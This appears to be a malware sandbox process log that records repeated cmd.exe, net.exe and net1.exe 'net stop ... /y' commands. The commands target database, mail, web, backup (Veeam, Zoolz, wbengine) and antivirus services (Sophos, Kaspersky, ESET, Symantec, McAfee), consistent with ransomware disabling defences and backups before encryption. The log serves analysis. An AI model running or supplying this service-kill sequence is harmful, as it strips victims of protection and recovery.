net stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLSERVER /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLSERVER /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MySQL57 /y
C:\Windows\SysWOW64\net.exe
net stop MySQL57 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ntrtscan /y
C:\Windows\SysWOW64\net.exe
net stop ntrtscan /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop OracleClientCache80 /y
C:\Windows\SysWOW64\net.exe
net stop OracleClientCache80 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop PDVFSService /y
C:\Windows\SysWOW64\net.exe
net stop PDVFSService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop POP3Svc /y
C:\Windows\SysWOW64\net.exe
net stop POP3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$TPS /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop RESvc /y
C:\Windows\SysWOW64\net.exe
net stop RESvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop sacsvr /y
C:\Windows\SysWOW64\net.exe
net stop sacsvr /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SamSs /y
C:\Windows\SysWOW64\net.exe
net stop SamSs /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SAVAdminService /y
C:\Windows\SysWOW64\net.exe
net stop SAVAdminService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SAVService /y
C:\Windows\SysWOW64\net.exe
net stop SAVService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SDRSVC /y
C:\Windows\SysWOW64\net.exe
net stop SDRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SepMasterService /y
C:\Windows\SysWOW64\net.exe
net stop SepMasterService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ShMonitor /y
C:\Windows\SysWOW64\net.exe
net stop ShMonitor /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop Smcinst /y
C:\Windows\SysWOW64\net.exe
net stop Smcinst /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SmcService /y
C:\Windows\SysWOW64\net.exe
net stop SmcService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SMTPSvc /y
C:\Windows\SysWOW64\net.exe
net stop SMTPSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLBrowser /y
C:\Windows\SysWOW64\net.exe
net stop SQLBrowser /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net.exe
net stop SQLSafeOLRService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net.exe
net stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLWriter /y
C:\Windows\SysWOW64\net.exe
net stop SQLWriter /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamBackupSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamCloudSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net.exe
net stop VeeamDeploymentService /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamDeploySvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamMountSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamMountSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamNFSSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamRESTSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamTransportSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop W3Svc /y
C:\Windows\SysWOW64\net.exe
net stop W3Svc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wbengine /y
C:\Windows\SysWOW64\net.exe
net stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop WRSVC /y
C:\Windows\SysWOW64\net.exe
net stop WRSVC /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net.exe
net stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop swi_update /y
C:\Windows\SysWOW64\net.exe
net stop swi_update /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "SQL Backups" /y
C:\Windows\SysWOW64\net.exe
net stop "SQL Backups" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "SQL Backups" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net.exe
net stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop msftesql$PROD /y
C:\Windows\SysWOW64\net.exe
net stop msftesql$PROD /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net.exe
net stop NetMsmqActivator /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop EhttpSrv /y
C:\Windows\SysWOW64\net.exe
net stop EhttpSrv /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ekrn /y
C:\Windows\SysWOW64\net.exe
net stop ekrn /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop ESHASRV /y
C:\Windows\SysWOW64\net.exe
net stop ESHASRV /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop AVP /y
C:\Windows\SysWOW64\net.exe
net stop AVP /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop klnagent /y
C:\Windows\SysWOW64\net.exe
net stop klnagent /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net.exe
net stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop wbengine /y
C:\Windows\SysWOW64\net.exe
net stop wbengine /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c net stop mfefire /y
C:\Windows\SysWOW64\net.exe
net stop mfefire /y
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
Network
Files